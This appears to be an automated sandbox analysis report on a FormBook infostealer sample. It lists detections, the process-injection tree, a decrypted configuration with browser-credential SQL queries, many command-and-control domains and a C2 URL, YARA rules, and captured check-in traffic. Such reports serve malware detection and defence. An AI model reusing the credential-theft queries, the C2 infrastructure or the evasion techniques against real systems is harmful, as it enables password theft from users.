Loading ...

Play interactive tourEdit tour

Analysis Report RRW9901200241.exe

Overview

General Information

Sample Name:RRW9901200241.exe
Analysis ID:339369
MD5:61ffb4ad4721f51413075923b2e9468d
SHA1:aa9ca98955157ca28bdbb1d8d29c3d1af2e28023
SHA256:546e873e9e746eeee9cbed391ff7463ce192091ee0ff51c076291da5d836f64f
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RRW9901200241.exe (PID: 3016 cmdline: 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: 61FFB4AD4721F51413075923B2E9468D)
    • RRW9901200241.exe (PID: 6148 cmdline: 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: 61FFB4AD4721F51413075923B2E9468D)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6476 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6556 cmdline: /c del 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bbd", "KEY1_OFFSET 0x1d5b1", "CONFIG SIZE : 0xa9", "CONFIG OFFSET 0x1d6ae", "URL SIZE : 20", "searching string pattern", "strings_offset 0x1c193", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x891aaffb", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "grayfoxden.com", "drupadhyayashomoeopathy.com", "coordinatedcare-ok.com", "the-legend-update3.com", "remoteworkoffer.com", "r3dprojects.com", "banhuaihangschool.com", "7852bigbucktrail.info", "villagepizzafloralpark.com", "sgtradingusa.com", "evolvestephanieperreault.com", "timelessbeautylessons.com", "monkeytrivia.com", "bsf.xyz", "canda.design", "recetasnutribullet.com", "olenfex.com", "catatan-matematika.com", "roeltecnologiadigital.com", "jutoxnatural.com", "euroticie.info", "tmxinc-chemicals.com", "futurehawick.com", "xaxzwz.com", "kitfal.com", "mickey2nd.com", "world10plus.com", "harkinstheates.com", "conceptpowder.com", "aeshahcosmetics.com", "netglog.net", "mystery-enigma.net", "packerssandmover.online", "weinsurehumans.com", "estrade-monschau.com", "poinintiteknologi.com", "zipdelta.com", "thibau4.xyz", "immobiliervaldoingt.com", "superherospirit.com", "c-vital33.com", "dydongyuan.com", "glamatomy.com", "campingpt.com", "wozhebank.com", "citestaccnt1597754710.com", "localcryptod.com", "celinemnique.com", "broderies-admc.com", "watdomenrendi03.net", "dehaochu.com", "missbeehavn.com", "ryangyoung.com", "kcspantry.com", "posdonanim.com", "directtestingservice.com", "toastxpress.com", "kingdommarketinguniversity.com", "quantumtoday.xyz", "modernhomespa.com", "peakeventsservices.com", "dellvn.net", "maryjoyllc.com", "trentog.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.unitvn.com/krc/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.RRW9901200241.exe.1a00000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.RRW9901200241.exe.1a00000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.RRW9901200241.exe.1a00000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        2.2.RRW9901200241.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.RRW9901200241.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: RRW9901200241.exeAvira: detected
          Antivirus detection for URL or domainShow sources
          Source: http://www.unitvn.com/krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bbd", "KEY1_OFFSET 0x1d5b1", "CONFIG SIZE : 0xa9", "CONFIG OFFSET 0x1d6ae", "URL SIZE : 20", "searching string pattern", "strings_offset 0x1c193", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x891aaffb", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: RRW9901200241.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: RRW9901200241.exeJoe Sandbox ML: detected
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.RRW9901200241.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: RRW9901200241.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: RRW9901200241.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RRW9901200241.exe, 00000000.00000003.337251978.000000001B070000.00000004.00000001.sdmp, RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmp, cmd.exe, 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe, 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RRW9901200241.exe, cmd.exe
          Source: Binary string: cmd.pdb source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,4_2_002B245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,4_2_002B68BA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,4_2_002AB89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_002A85EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,4_2_002C31DC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 4x nop then pop edi2_2_00417D6E

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.7852bigbucktrail.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=idO/LAWRhq8eaiStiRRR14QihBlHCWd10ZsS07gNigVsPM/nj7NW3DcAwcUnOO2Dm4jIcS3FWg==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.toastxpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.unitvn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: SUPERDATA-AS-VNSUPERDATA-VN SUPERDATA-AS-VNSUPERDATA-VN
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.7852bigbucktrail.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=idO/LAWRhq8eaiStiRRR14QihBlHCWd10ZsS07gNigVsPM/nj7NW3DcAwcUnOO2Dm4jIcS3FWg==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.toastxpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.unitvn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.7852bigbucktrail.info
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 1237Date: Wed, 13 Jan 2021 20:49:10 GMTServer: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 